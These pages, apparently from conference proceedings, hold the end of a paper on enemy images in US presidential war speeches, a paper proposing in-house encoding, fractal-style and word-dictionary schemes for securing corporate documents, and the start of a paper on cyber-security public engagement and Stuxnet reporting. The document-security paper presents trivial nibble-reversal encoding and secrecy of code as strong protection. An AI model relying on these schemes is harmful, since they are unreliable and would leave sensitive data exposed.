the United States justified the military operations initiated by their country in the Persian Gulf and in
Kosovo. The image of the enemy consisted of about ninety percent of these very elements, with minimal
verbal and conceptual variations. The most frequently repeated paired concepts in defining one’s side
and the opposing side were ‘humane – barbaric’, ‘good caring leaders – tyranny’, ‘defensive – offensive’
and ‘trustworthy – untrustworthy’. The other analyzed paired concepts based on Zur’s chart also
systematically appeared in the speeches, although they were not repeated as often, or they were referred
to more indirectly.
3. Situation-specific features complement basic features
Furthermore, the speeches repeated two additional elements, the importance of one’s own interests and
the danger of the enemy. Both were necessary to give substance as to why immediately initiating a war
was necessary. The speeches justified in many words and from several points of view why the enemy
was completely wrong in principle and why one’s own side was completely right in principle. However, it
could remain somewhat unclear to the audience why it was necessary to initiate a war against the
enemy. Were the theoretical bases alone sufficient? Was it worth sacrificing one’s own soldiers on behalf
of an abstract ‘justice’ to quell an equally abstract ‘injustice’? A part answer was attempted in referring to
stopping brutality in the speeches. War was necessary in order to prevent the enemy from killing and
persecuting innocent victims in Kuwait, Iraq and Kosovo (Bush, 1991-01-09; Clinton, 1999-03-27; Bush,
2003-03-01). Here there was no question of theory, but the actual saving of human lives, which was a
noble and generally laudable aim.
Nevertheless, some of the audience could still call into question the necessity of taking up war. Why
sacrifice Americans to save Arabs living in the Middle East or Albanians living in Europe? This question
could be answered by arguing that the question was not primarily about strangers living far away, but at
stake were the Americans’ own vital national interests (Bush, 1990-12-24; Clinton, 1999-03-24a; Bush,
2003-03-01). What these interests specifically included was not necessarily stated, so that defining
questions could be avoided. A few of the speeches however could refer on a general level to peace,
stability, economic prosperity and above all to security. The most commonly used detailed reference was
that war was necessary to ensure the Americans their own safety (Bush 1991-01-16; Clinton 1999-03-
24b; Bush, 2003-03-04). At the same time the safety of residents in the Middle East and Europe was
safeguarded, but at the top of the priority list was ensuring the secure future of one’s own community.
So that war could be presented as the protector of one’s own safety, there first had to be a grave threat to
security. In the case of Saddam Hussein the appropriate threats were his alleged projects for weapons of
mass destruction, especially the acquisitioning of nuclear weapons. If Saddam Hussein was successful in
his project, the United States would no longer be safe anymore than any other state. As the speeches
stated (Bush, 1991-01-05; Bush, 2003-03-04), Saddam Hussein had already used weapons of mass
destruction against his own people and he was also unpredictable. It was necessary to act immediately,
4

Kari Alenius
so that the enemy would not have time to grow too strong and frightening. Persuasive rhetoric more
generally attempts to make hasty decisions by presenting delay as disastrous (Luostarinen, 2002: 36).
Thus, psychological pressure can be put on listeners not to remain reflecting on issues themselves. They
are preferably directed to act quickly and without questioning the already thought-out models that their
persuaders offer.
In Kosovo’s case it was not possible to refer to the threat created by weapons of mass destruction, as the
Yugoslavian/Serbian leadership had not shown any interest in them. Instead, it was possible to exploit
the image of the Balkans as a ‘powder keg’ that had allegedly sparked two world wars (Clinton, 1999-03-
24a; Clinton 1999-03-27). This was obviously a coarse simplification, and additionally in the case of the
Second World War, it was basically very unclear how even the formal reason for the outbreak of war
could be situated in the Balkans and the area that was presumed prone to crisis. In spite of these factors
the ‘powder keg’ concept was useful in the case of Kosovo because such a feature was commonly
attached to the Balkans. In Clinton’s (1999-03-24b; 1999-03-26) speeches, immediately initiating acts of
war against Yugoslavia were necessary so that the escalation and broadening of the crisis could be
prevented. Any delay would only lead to greater damage and more victims because the problem had to
be solved by force sooner or later. The logic of urgency was exactly the same as in the case of Iraq.
The analogy to the world wars was also used to explicitly justify the need for a rapid response. According
to Clinton (1999-03-24a) the European democracies as well as the United States itself had made a great
mistake in hesitating and had too long attempted to mediate. How the experiences of the world wars
could certainly prove that the evolution of Yugoslavia would be the same was of course unclear at the
level of principle. The comparison however justified the fact that with a sufficient degree of probability the
development would be the same: it would be foolish to make the same error a third time. At the same
time the analogy to the world wars was fitting in justifying the war effort of the United States far from
home. As the USA had already twice rescued Europe (Clinton, 1999-03-24a), it would ‘naturally’ once
again resolve the crisis. According to this logic the world wars undoubtedly showed that the Europeans
were not able to do so themselves. Thus, the United States was forced to participate, as in the light of
history it had no choice.
The image created by Presidents in the Persian Gulf in the years 1991 and 2003 as in Kosovo in 1999
was also, when considered as a whole, unconditional in the same way. The enemy was thoroughly evil,
guilty of heavy crimes, and was preparing to carry out even more horrific acts soon. This ever-growing
danger which was already directed to the United States itself definitely had to be eliminated now. One’s
own side had done its utmost to restore peace and justice, but all sensible proposals to defuse the crisis
fell down with the enemy’s reluctance to settle issues.
There remained no other option than the use of military force. This had to be undertaken with the
requirement of law and morals and the guidance of human values. The responsibility for casualties and
losses resulting from acts of war was the enemy’s alone, which had with its own actions forced the United
States to react exactly as occurred in the spring of 1991, 1999 and 2003.
References
Aho, J. (1994) This thing of darkness, University of Washington Press, Seattle.
Bush, G. (1990-12-24) Christmas Message to American Troops, [online], Available:
http://bushlibrary.tamu.edu/research/public_papers.php?id=2572&year=1990&month=12 [18 Nov 2010].
Bush, G. (1991-01-05) Radio Address to the Nation on the Persian Gulf Crisis, [online], Available:
http://bushlibrary.tamu.edu/research/public_papers.php?id=2596&year=1991&month=01 [18 Nov 2010].
Bush, G. (1991-01-08) Message to Allied Nations on the Persian Gulf Crisis, [online], Available:
http://bushlibrary.tamu.edu/research/public_papers.php?id=2598&year=1991&month=1 [18 Nov 2010].
Bush, G. (1991-01-09) Open Letter to College Students on the Persian Gulf Crisis, [online], Available:
http://bushlibrary.tamu.edu/research/public_papers.php?id=2608&year=1991&month=1 [18 Nov 2010].
Bush, G. (1991-01-16) Address to the Nation Announcing Allied Military Action in the Persian Gulf, [online], Available:
http://bushlibrary.tamu.edu/research/public_papers.php?id=2625&year=1991&month=1 [18 Nov 2010].
Bush, G. W. (2003-03-01) President’s Radio Address, [online], Available: http://georgewbushwhitehouse.archives.gov/news/releases/2003/03/20030301.html
[18 Nov 2010].
Bush, G. W. (2003-03-04) President’s Remarks to American Medical Association, [online], Available:
http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030304-11.html [18 Nov 2010].
Bush, G. W. (2003-03-08) War on Terror [online], Available: http://georgewbushwhitehouse.archives.gov/news/releases/2003/03/20030308-1.html
[18 Nov 2010].
Bush, G. W. (2003-03-16) President Bush: Monday “Moment of Truth” for World on Iraq, [online], Available:
http://georgewbush-whitehouse.archives.gov/news/releases/2003/03/20030316-3.html [18 Nov 2010].
5

Kari Alenius
Bush, G. W. (2003-03-19) President Bush Addresses the Nation, [online], Available: http://georgewbushwhitehouse.archives.gov/news/releases/2003/03/20030319-17.html
[18 Nov 2010].
Clinton, W. (1999-03-24a) Statement by the President to the Nation, [online], Available:
http://clinton6.nara.gov/1999/03/1999-03-24-remarks-by-the-president-to-the-nation-on-kosovo.html [19 Nov
2010].
Clinton, W. (1999-03-24b) Statement by the President on Kosovo, [online], Available:
http://clinton6.nara.gov/1999/03/1999-03-24-statement-by-the-president-on-kosovo-air-strikes.html [19 Nov
2010].
Clinton, W. (1999-03-26) Text of a Letter from the President to the Speaker of the House of Representatives and the
President Pro Tempore of the Senate, [online], Available: http://clinton6.nara.gov/1999/03/1999-03-26-text-of-aletter-to-the-congress-on-kosovo.html
[19 Nov 2010].
Clinton, W. (1999-03-27) Radio Address of the President to the Nation, [online], Available:
http://clinton6.nara.gov/1999/03/1999-03-27-radio-address-on-nato-air-strikes-for-peace-in-kosovo.html [19 Nov
2010].
Clinton, W. (1999-04-03) Radio Address by the President to the Nation, [online], Available:
http://clinton6.nara.gov/1999/04/1999-04-03-radio-address-on-peace-in-kosovo.html [19 Nov 2010].
Clinton, W. (1999-04-05) Statement by the President, [online], Available: http://clinton6.nara.gov/1999/04/1999-04-
05-statement-by-the-president-on-kosovo.html [19 Nov 2010].
Gergen, K. and Gergen, M. (1986) Social psychology, Springer Verlag, New York.
Harle, V. (2000) The Enemy with a Thousand Faces. The Tradition of the Other in Western Political Thought and
History, Praeger, Westport.
Luostarinen, H. (2002) ‘Propaganda, media ja sota’, in Huhtinen A. (ed.) Propagandan renessanssi – Julkisen
manipulaation paluu, Maanpuolustuskorkeakoulu, Helsinki.
Taylor, P. (2003) Munitions of the mind. A history of propaganda from the ancient world to the present era,
Manchester University Press, Manchester.
Wunsch, S. (2002), ’Image Research and the Enemy Image: The Soviet Union in Finnish Newspapers during the
Winter War (November 30, 1939 – March 13, 1940)’, in Alenius, K., Fält, O. and Jalagin S. (eds.) Looking at the
Other. Historical study of images in theory and practice, Oulu University Press, Oulu.
Zur, O. (1991) ’The love of hating: the psychology of enmity’, History of European Ideas, Vol 13, No. 4, pp 345-369.
6

Use of Compression Methods for Data Security Assurance
Dominic Asamoah 1 and William Oblitey 2
1 Kwame Nkrumah University of Science and Technology (KNUST), Ghana
2 GhanaIndiana University of Pennsylvania (IUP), Indiana, USA
dominic_asamoah@yahoo.co.uk
oblitey@iup.edu
Abstract: Organizations have documents that are not meant for public consumption. These documents provide the
organizations with their competitive advantages. To maintain their respective competitive advantages and stay in
business, the documents need to be secured and kept away from all unauthorized personnel. However, in this
electronic age, protecting such documents from copying or even browsing has become rather difficult. Computer
technology has made copying so easy and yet difficult for people to become aware that such copying has been
effected. To secure and protect such documents, various methods, including encryption techniques, have been
employed. This paper suggests three methods that better ensure the security of such critical electronic data.
Keywords: authentication; critical document; encoding; encryption; intellectual property; security assurance
1. Introduction
Organizations spend huge amounts of their financial resources to safeguard their intellectual properties
(trade secrets). Corporate intellectual property which, is needed to maintain the corporation’s competitive
advantage, ranges from formulae for products to strategic corporate plans. Firewalls are installed to
restrict unwelcome access from outside the corporate subnet; intrusion detection systems are employed
to detect and abort malicious activity; security testings are embarked upon to assess the effectiveness of
the security measures employed to safeguard the corporate intellectual property and other information
assets. However, the greatest threat of the corporate intellectual property is people threat, particular
insider threat. Insider threats, or internal attacks, originate from inside the organization. They include
disgruntled employees, curious users, or accidental misuse of the corporate computing systems. This
paper presents methodologies for securing corporate intellectual property that takes insider threats into
consideration.
2. Known methods of securing data and their inherent problems
There are several methods presented in the literature (see, for example Panko 2005) for protecting data
on computing systems. These include physical protection, backup schemes, system logging,
authentication schemes, and encryption techniques. We explain these methods and describe a few
known problems with their use.
2.1 Physical protection
Physical protection places the document that needs to be secured under lock and key. Some
corporations also rent bank vaults to add extra security to their documents. Backups are stored at
separate locations from the original document, making them useful should the original copy be lost to fire
or other natural disaster. However, keys are known to have been copied and accessing the physically
protected data still causes the data to be exposed to the person who is assessing it and also to any
eavesdropper who might be around.
2.2 System Logging
System logging is the collection of data on security events in a log file. The computer system holding the
intellectual property can be set up to log any user who accesses that particular file. In addition to logging
access to the file on the computer system, it has been suggested by Panko (2) that the door to the room
where that particular computer holds the intellectual data can also be logged for later analysis. Thus, if
several incidents occur, an analysis of the door logs might be used to narrow the number of possible
perpetrators to only a few. Again, hackers who know what they are about can either change their log
entries or remove them from the file.
2.3 Authentication schemes
Authentication schemes are employed to get people to prove their identities before they are provided
access to the system or facility. The four types of authentication mechanisms (something you know,
7

Dominic Asamoah and William Oblitey
something you have, something you are, and something you produce) have been applied in various
situations. For more critical situations, strong-authentication schemes which combine two or more of
these four types have been employed.
2.4 Encryption techniques
Encryption is the process of converting an original massage into a coded form that does not make sense
to anyone who does not have a means of decoding it back to its original form. It is accomplished by using
algorithms to manipulate the plaintext message into ciphertext. Encryption can thus be used in securing
the corporate intellectual property. Several encryption techniques exist but the classification is mainly into
symmetric and asymmetric encryption. Symmetric encryption employs the same encryption algorithm and
key to use in both enciphering and deciphering the text. A number of popular symmetric encryption
systems are available. One of the more familiar is Data Encryption Standard (DES) which was developed
by IBM in 1977. Another is triple DES (3DES) which was developed as an improvement on DES. A
successor of 3DES is the Advanced Encryption Standard (AES). The problem with simple DES is that the
same input plaintext always produces the same output cyphertext, thus providing opportunities for skilled
cryptanalysts to crack the DES key. 3DES is also slow and uses excessive amounts of memory.
Asymmetric encryption employs two different keys: one for encrypting the text and the other for
decrypting it. The encrypting key is made public for use by anyone who wants to encrypt a message for
the owner but only the owner’s decrypting key can be used to decrypt the message. One of the most
popular public key cryptosystems is the RSA system. However, several algorithms which exist for
cracking the RSA system were reported by Boneh in 1999 and by Salar et. al. in 2006.
3. The proposed methods
We propose three methods for securely storing corporate electronic intellectual property. These are an inhouse
encoding scheme of the document, an object-oriented function for reducing the document into a
coded form, using an algorithm close to those used in processing fractals. This encoded form of the
document would then have to be expanded back into its original form for access. Our third method is the
use of an encoded word function which reduces the document to the minimal amount of words employed
in it, and is expanded again for access.
3.1 Use of in-house encoding scheme
One sure way of assuring data security of an extremely critical document is to encode the document
using an in-house coding scheme that has been defined such that it is close to the ASCII, EBCDIC, or
Unicode schemes but completely unique to the organization and known only to personnel with corporate
security clearance (Fig. 1). To add to the security of the data, the encoded document would be also
encrypted using a very strong encryption key. To store this document, it is essential that its
characteristics in the form of block size, the medium holding the document, and its last access date and
time be placed on file (Fig. 2). Even when an authorized person needs to access the document, that
person must be accompanied by an assigned authenticator. Both this person and the authenticator would
then check the block size of the document when uploaded into the computer system against the value on
file before granting permission to the person who wants to access the document. When this person is
done with the document’s access, the authenticator needs to join him or her to update the characteristics
of the document onto the file for storage.
Algorithm Encode (ASCII)
Read character as original code;
Break code into two nibbles;
Call nibbles z-nibble and v-nibble;
Reverse nibbles
Reconstruct document with reversed nibbles (v-nibble concat z-nibble)
Print document
Figure 1: Sample in-house encoding scheme algorithm
8

Dominic Asamoah and William Oblitey
Block Size Medium Last Accessed
X Y Z
x – size of file in bytes
y – type of medium on which file is stored
z – date of last access of file in ddmmyyyy format
Figure 2: File storage parameters
3.2 Use of object-oriented functions
Another method for assuring the security of the data in an extremely critical document is to examine the
document in terms of its constituent contents. Documents for digital storage may be of text, images
(including music scores), audio, or video. Images, audios, and videos have much resemblance to fractals,
and in most cases, can be treated as such. Since fractals can be split into parts, each of which is a
reduced-size copy of the whole body, the idea of singling out a part can be employed in securing the
entire body of the critical document. Most text documents also tend to have parts that are repeated in
other places within the document. Thus text documents could also be considered as some form of
fractals and the same technique of singling out the reduced-size part for later replication in securing
documents can also be applied to these text documents (Fig. 3).
Algorithm Text Fractal
Let Q(n) represent the document;
Let p1, p2, …, pn represent the phrases in Q(n);
Let di represent the relative position of pi from start of Q(n);
Where pi = pj = pk = …;
Drop pj, pk, …;
Keep pi;
Append dj, dk, …, to parameters of pi;
Figure 3: Algorithm for creating fractal function
This method employs the Object-Oriented Programming compression scheme and it takes the central
recurring piece of the document and treats that piece as an object. This object is represented as a block
of data or image which is described once and can be reused as many times as desired. The object is a
block of pre-assembled programming code that is a self contained module. The module contains, or
encapsulates both a chunk of data and the processing instruction that may be called upon to be
performed on that replicable data. Once the object becomes part of the program, the processing
instruction may or may not be activated. Activation of the processing instruction happens only when the
critical document needs to be regenerated. On the regeneration, an alert is sent to the object and the
operation involving that object is then performed. The performance of the operation is embedded within
the processing instructions as part of the object.
The suggested method to secure the critical document is therefore to examine the original document as
to whether it shows replicable parts. If this is so, then the reduced-size copy of the document can be
captured into an object-oriented program’s function. The number of repetitions of the reduced-size copy,
when used to invoke the function would reproduce the document. Of course, limits and boundaries will be
needed in the function to ensure that the exact replica of the original documents is what is always
reproduced. This way, the organization would not maintain any paper documents of the critical data and
would rather employ the algorithm to reproduce a softcopy anytime the document is needed.
3.3 Use of encoded word function
A third method that is being proposed and which seems to have been overlooked by security experts is
what this dissertation calls the encoded word function scheme. This scheme takes the critical document
and encodes the various words in it with reference to their respective positions of occurrence. It then
uses the words to build a data dictionary for use by the function (Fig. 4). The words in the data dictionary
9

Dominic Asamoah and William Oblitey
are kept unique and their frequency of occurrence within the document is referenced against each word,
as to its position on a page and on a line. The function thus only expands the data dictionary to recreate
the document by taking each word in turn and following the suggested links in the data dictionary to
determine the locations of those words (Fig. 5). Thus both function and data dictionary are needed to
recreate the critical document. The critical document cannot be recreated by either function or data
dictionary by itself. Both must be employed to recreate the critical document. To further enhance the
security of the critical document by this method, the source code to the function should be kept secret,
perhaps in a locked cabinet, and only the object code used when required. The data dictionary used by
the function can also be encrypted and decryption would then be required before the function can operate
on it.
Word Position of Occurrence in Document
Page # Line # Positions on line
w1 x,y,z… a,b,c… i,j,k,…
w2 x,y,z… a,b,c… i,j,k,…
w3 x,y,z … a,b,c… i,j,k,…
. . . .
. . . .
wn x,y,z a,b,c i,j,k,…
Figure 4: Data dictionary for encoded word function
Figure 5: Algorithm for document reproduction
4. Conclusion
Algorithm Recreate Document
For word = 1, n;
Read wi;
For page = 1, m;
For line = 1, j;
For postn = 1, p;
Print wi;
We have presented three methods for securely storing corporate electronic intellectual property. The first
was an in-house encoding scheme which took the characters in the document and broke each down into
the nibbles of the machine’s encoding scheme. The nibbles were then reversed for storage and would be
reconstructed for future access of the document. The second was an object-oriented function that
reduced the document into a coded form, which employed an algorithm similar to those used in
processing fractals. This encoded form of the document would then have to be expanded back into its
original form for access. Our third method was the use of an encoded word function which reduced the
document to the minimal amount of words employed in it, and would have to be expanded again for
access.
References
Boneh, D.,1999, “Twenty years of attacks on the RSA cryptosystem,” Notices of the American Mathematical Society
(AMS) Vol. 46, No. 2, pp. 203 – 213.
Cormack, G. V, 1985, Data Compression on a Database System. Commun. ACM 28, 12 .
Held, Gilbert., 1987, Data Compression : Techniques and Applications Hardware and Software Considerations, John
Wiley & Sons Ltd.
Mehlhorn, K, 1980. An Efficient Algorithm for Constructing Nearly Optimal Prefix Codes. IEEE Trans. Inform. Theory
26, 5.
Panko, R. R, 2005, Corporate Computer and Network Security, Prentice Hall Publishers, Upper Saddle River, NJ.,.
Salah, I.K., Darwish, A., and Oqeili, S.,2006, “Mathematical attacks on RSA cryptosystem,” Journal of Computer
Science, August.
10

Cyber Security: Time for Engagement and Debate
Debi Ashenden
Cranfield University, Swindon, UK
d.m.ashenden@cranfield.ac.uk
Abstract: This paper explores the issue of public engagement with cyber security issues and positions it as a key
factor in ensuring cyber security. Reported incidents of vigilante hacking are given as examples of the role of the
public in cyber security. The case is made that in order to ensure public engagement and to manage the potential
threat from vigilante hackers we need more inter-disciplinary academic research and better quality journalism. The
role of the public and the link between the state and the public as mediated through cyberspace is used as a case
study to set the context. To explore the issue of inter-disciplinary research a brief review of current academic
literature is outlined. The topic of better quality journalism is examined using content analysis of newspaper reports
focusing on the Stuxnet worm. The paper concludes that at a very basic level without increased academic debate or
better quality journalism we will have little to inform our public engagement programme. One area to be addressed
that emerges strongly through the research is the need for a lexicon and framework for discussing cyber security.
This is necessary, at least at a high level, in order to conceptualise the problems and to support work that crosses
academic disciplines. A suggested high level lexicon is presented together with a simple framework to facilitate
engagement and debate.
Keywords: cyber security, debate, engagement, lexicon, framework
1. Introduction
It has been a busy eighteen months in the UK for the seemingly ubiquitous term ‘cyber’. It started with the
publication of the UK’s Cyber Security Strategy in 2009, closely followed by the establishment of the
Office of Cyber Security and the Cyber Security Operations Centre. Momentum gathered and in the
media we have seen reporting of the Stuxnet worm as an instance of ‘cyber war’. Also in recent months
we have had speeches from the Director General of the Security Service and the Director of GCHQ
discussing ‘cyber espionage’ and ‘cyber security’ respectively. Finally we now have the Strategic Defence
and Security Review categorising cyber security as a Tier One threat and outlining plans to invest £650m
on a ‘National Cyber Security Programme’ over the next four years. It is a busy time for ‘cyber’.
Cyberspace has been compared to land, sea and air as a space within which we need to protect and
maintain our position as a nation state. Intuitively this may seem like a helpful comparison but, of course,
cyber is very different from land, sea and air in so many ways. As a concept ‘cyber’ is a slippery term,
hard to pin down, has different meanings across different communities and is a prefix for many other
words. When put before ‘espionage’ and ‘warfare’ discussions are usually highly classified but put cyber
before ‘security’ and discussions can be many and varied across both the public and the private sector. It
is not surprising then that when the term ‘cyber’ is used it is invariably quickly followed by a muttered
‘whatever that means’ under the speaker’s breath.
The purpose of this paper is to put the case for why we now need a deeper debate about cyber, in
particular about specific issues that we can foresee. We have given ‘cyber’ a good airing but now we
need to move on and examine in detail and with precision. An issue that will serve as illustration is the
role of the public and the link between the state and the public as mediated through cyberspace. The
individual can easily be both a vulnerability and a threat in this space and without debate and public
engagement public activity could have real implications for our ability to protect and maintain our security.
To tease out such issues in order to debate them we will need to cross disciplines from social sciences to
technology and from law to ethics. To engage with the public we will need to develop access to in-depth
journalism. None of this will be possible, however, without at least some precision in the way we use the
term ‘cyber’.
2. The Problem: The need for public engagement
Public engagement is a vital part of any strategy for cyber security because the public is inside the threat
environment. There are ongoing Government campaigns to get the public online, free tuition, help to buy
equipment and access in public places. The public are taking an active role in cyberspace in increasing
numbers and their usage is largely uncontrolled. In the space of land, sea and air the home population
can often be physically separated from the threat environment but they are an integral part of
11

Debi Ashenden
cyberspace. As a result the public can be both a vulnerability and a threat. To counter the risk this poses
different forms of public engagement will be necessary.
There is an acknowledgement in the UK Cyber Security Strategy of the role of the public and their
responsibility to protect themselves and their technology. With the connectivity between public and
private sector systems, and with increasing numbers of individual citizens being encouraged to interact
online, the ability to protect domestic networks and computers has never been higher. Individuals have
an important role to play in delivering the 80% of cyber security described by the Director of GCHQ
(2010); they need to understand how to ensure that they are not inadvertently facilitating attacks (for
example, by becoming part of a BotNet). A balance has to be struck, however, between making the
public aware of the risks of online activities and encouraging them to exploit the benefits available. A
population that loses trust in cyber is likely to disengage from using online government services and in
the current economic climate this would have significant consequences. To counter the vulnerability
posed by the public we have public/private partnerships such as Get Safe Online to educate and inform
but there is scope to expand and add depth to such initiatives.
The public, however, are also on the inside of the remaining 20% of cyber security – the complex threat
of cyber espionage, cyber terrorism and cyber war. So what might this threat look like? It is generally
accepted that most of the tools and techniques necessary to carry out cyber attacks are already available
online. It is conceivable that an event could take place in cyberspace which would prompt retaliation from
sections of the home population. We have already seen the potential of social networking sites for
bringing together and assisting groups of people with a common outlook to mobilize on specific issues.
Attacks launched by such groups would undoubtedly break the law and constitute vigilante activity. On a
small scale presumably this could be handled by law enforcement agencies in the same way that any
other vigilante activity is handled. On a larger scale, where there could effectively be mob activity online,
this may not be practicable (it is easy to see that at the very least forensic computing resources could be
quickly exhausted). Such a scenario exemplifies why there needs to be a debate across technical, legal,
policy and ethical boundaries about how to respond. It is highly likely that in such circumstances a
number of agencies will need to work together and appropriate governance structures would need to be
in place.
This leads us into an examination of vigilante activity as evidence of the need to consider the role of the
public as a threat. Is this notion of the ‘patriotic hacker’ too far fetched to warrant consideration? It seems
not. Dorothy Denning (2003) cites the examples that occurred in response to the 9/11 attacks. The
hacker Fluffi Bunny redirected tens of thousands of web sites to one on which he had left a message. A
group called the Dispatchers and led by Hackah Jak defaced hundreds of web sites and threatened to
attack web servers and internet access in Afghanistan and other nations that were perceived to be
supporting terrorism. There are instances of nation states that either turn a blind eye to patriotic hackers
or actively encourage them. One such instance is China’s mobilisation of students against Japan (Nye,
2010). Most recently we have seen the ‘hactivist’ group Anonymous launch distributed denial of service
attacks against Mastercard, Visa and Paypal in protest at the withdrawal of their financial services from
Wikileaks (The Guardian, 28 th January 2011). Without doubt it is easy to see how the public can become
a threat in cyberspace and the Government will need to be able to manage, minimise or curtail their
actions.
The activities of patriotic hackers can put the nation state in a very difficult position. Particularly as it is
increasingly likely that states will be liable for, and expected to take responsibility for, any attacks that are
launched from their jurisdiction. Physical action may be required to halt such activities (such as
disconnecting systems from networks) but alongside this there will be a need for a different form of public
engagement that persuades and influences individuals to desist. We need to better understand the
management of power in cyberspace where power is no longer concentrated in the nation state but is
diffused across the citizen population (Nye, 2010). Cyberspace gives the individual more power by
enabling the individual to carry out his or her own will. The nation state has to learn how to counter this
expression of power and this might take the form of physical action, or by achieving influence in
cyberspace by agenda setting or framing activities (Nye, 2010). As the National Research Council (2009)
points out in a worst case scenario, it may be necessary for a state to direct a cyber attack against
patriotic hackers and in such a case justification, context, attribution and approval will need to be very
carefully considered.
12

Debi Ashenden
We can see that public engagement is likely to be a key part of a nation’s strategy for ensuring cyber
security. As a potential vulnerability individuals need to know how to protect themselves and play their
part in protecting the UK’s critical infrastructure. To counter the potential threat from individuals we need
to better understand how to frame and manage the cyber agenda, and how to influence and take action if
civilian activity endangers the security of the nation state. To achieve these aims we need to understand
how to develop messages that engage and inform.
3. The approach
The purpose of this paper is to understand what needs to be done to tackle the problem of public
engagement with cyber security. Similarities are often drawn between discussions on cyberspace and the
discussions that surrounded nuclear power in previous decades (Clarke & Knake, 2010; Michael et al,
2010). It has been pointed out that even though the nuclear debate involved highly classified information
governments and academics still found a way to discuss the issues so as to develop strategy and policy
(Clarke & Knake, 2010). There have been a number of calls recently for more debate among experts on
the subject of cyber war and, in particular, for the development of an intellectual framework to discuss
cyber issues (National Research Council, 2010). Clarke & Knake take the general call for debate a step
further and suggest that ‘in-depth journalism and meaningful academic research’ is needed. At a very
basic level without sufficient debate we will have nothing to inform our public engagement programme.
Our starting point in this paper is that we first need to understand what material is available with which to
develop messages. To achieve this aim a two-pronged approach was taken to look at both academic
research and journalism on the subject of cyber security. Firstly, a brief review of the academic literature
recently published on cyber security was carried out. The review considered the arguments put forward
as well as the theoretical approach used in the research. Secondly, an examination of newspaper articles
was carried out to explore the messages currently being promulgated to the public. To bound the scope
of the research the recent Stuxnet worm incident was chosen as a case study and content analysis was
used to thematically examine newspaper reports in the UK that reported the incident.
4. Material for developing a message
There is a paucity of academic literature on cyber and of that which exists much has failed to maintain its
currency since the early 2000s. Furthermore there is the problem of writing in academic silos. Denning &
Denning (2010) recently published a discussion paper aimed at encouraging computer scientists to
participate in the cyber war discussion and suggesting that their voices have not been heard sufficiently.
This may be specific to the US but the reverse has always seemed to be the case in the UK with
computer scientists and technologists dominating the debate. Based on recent experience, however, it
may well be that this is more a question of different academic communities failing to engage in debate
across disciplines so that a partial view is only ever achieved.
Of the literature that does exist on cyber war there is hardly any that is empirical or grounded in theory. In
general there is a tendency to rely on newspaper reports for information or to use what Bendrath (2001)
refers to as ‘anecdotal collections of well known hacks’- most often the cyber attacks on Estonia and
Georgia. Only a few papers locate their discussion of cyber in a wider theoretical discourse such as risk
(Bendrath, 2001), or power (Nye, 2010).
If academic debate and research is lacking then in-depth journalism as Farivar (2009) points out is even
harder to find. A review of the main period of newspaper reporting of the recent Stuxnet worm in the UK
will serve as illustration. The main broadsheet newspapers covered the story and articles also appeared
in the Sunday newspapers. The only tabloid newspaper to publish stories on Stuxnet was the Daily Mail.
The Economist and the New Scientist also included coverage. This seems encouraging and stories were
not confined to the technology section of newspapers but were also included in world news sections.
The first instance of a mention of Stuxnet seems to have been coincidental as it came up during an
interview with a computer virus expert from the anti-virus vendor Symantec (The Guardian, 28 th August,
2010). This article was in the ‘Money’ section of the newspaper and gave an overview of the working life
of the interviewee. It was a month later that the story of Stuxnet took off and began to be widely reported.
The main voice that was heard throughout the reporting of Stuxnet and across all mainstream
newspapers during this period was from Symantec.
The systems under attack from the Stuxnet worm are generally described as SCADA systems but most
reports go further than this and suggest with varying degrees of certainty that a nuclear power station
13

Debi Ashenden
(specifically the Bushehr plant) in Iran was the target asset. Several reports either completely fail to
mention that other countries were affected by the worm or it is referred to in passing at the end of the
article.
In the August report The Guardian was told by Symantec that they had ‘no idea of the source’ and that it
was very hard to attribute malware but it was not long before reports were specifying that only a nation
state could have developed the worm and Israel and the US were quickly in the frame. This seems be
attribution by finger-pointing rather than any forensic evidence as the reports are primarily reliant on
commercial, anti-virus, vendors. The dominant voice was that of Symantec with other companies such as
Lumension, Sophos, Trend Micro and Kaspersky also giving their views. The only Western Government
comments specific to the Stuxnet worm that are attributed in the mainstream media are expressed by the
US through General Alexander (the Head of US Cyber Command). It is only towards the very end of the
reporting period that we get a broader range of commentators (although not greater depth of
commentary) from the Director of the US Cyber Consequences Unit, the Centre for Strategic and
International Studies in Washington and the International Security Programme at Chatham House.
The Stuxnet worm has been described recently as an important event but a distraction from the task of
engaging and educating the public about cyber security. It could be seen, however, as a missed
opportunity to educate the public. In the mainstream media there was very little attempt to engage in any
debate that went beyond reporting what the anti-virus vendors said. It is unfortunate that if this was a
turning point in cyber security that the dominant voice heard by the public belonged to a commercial
company.
There is a real need for debate among experts and academic research both to inform cyber strategy in
general but also to provide specific answers to questions such as those around the role of the public.
Research has to cross disciplines and acknowledge that cyberspace is both a physical and a social
construction and has to be considered as such if we are to make progress. The complexities of the
threats and the implications that arise from them have to be explored and discussed. This has to go
hand-in-hand with better quality journalism if the public engagement question is to be addressed.
5. Discussion: ‘cyber’ - what’s in a name?
If we are to meaningfully engage with the public we will need well-developed messages that use
language with clarity and precision. While too much time can be spent trying to reach definitions that are
widely agreed we do need some differentiation between the terms that we use in order to make thoughts
clear and to develop our ideas.
It has been suggested that it is too difficult to categorise different types of cyber attack and that it is
pointless to do so because we have to respond to the attack as it is presented. This may be the case
operationally for those who are managing the networks and who may not know at the beginning of an
incident (or, indeed, at the end) what type of cyber attack or exploitation they have witnessed.
Conceptually, however, it is very difficult to debate scenarios without at least some delineation.
The dangers of not doing this are twofold. Firstly, it is highly likely that debates will occur with participants
talking at cross purposes, each believing that everyone else sees the world of cyber as they do.
Secondly, and more importantly, risk perceptions will become skewed as everything from a hack on a
social networking account to online credit card fraud is referred to as ‘cyber war’. The risk of each attack
scenario then spirals up and provides the spectre of an attack from a nation state. Conceptually it would
be more useful to disentangle the different elements of each scenario to better understand the risk posed
(for example, online credit card fraud may be an opportunistic attack, it may be part of a larger criminal
operation or it may be used to fund terrorism). Without such differentiation debate tends to collapse. A
similar effect occurs through the use of the term ‘attack’ and in many cases numbers of attacks are
reported but not the damage caused neither is there usually a definition of what constitutes an attack.
This leads to the situation where newspaper reports talk of ‘millions of attacks’ (Nye, 2010) leaving the
reader to decide for themselves what this might mean.
Probably the most useful discussion around the need for more precise language for cyber is made by
Myriam Dunn Cavelty (2010). She describes a ‘cyber-escalation ladder’ as a way of helping policy
makers to prioritise. The first three rungs of the ladder are cyber vandalism and ‘hactivism’, cyber crime,
and cyber espionage. The fourth rung is cyber terrorism and the fifth is cyber war. It seems to me that the
first three rungs (with the possible exception of state sponsored cyber espionage) are defended by what
14

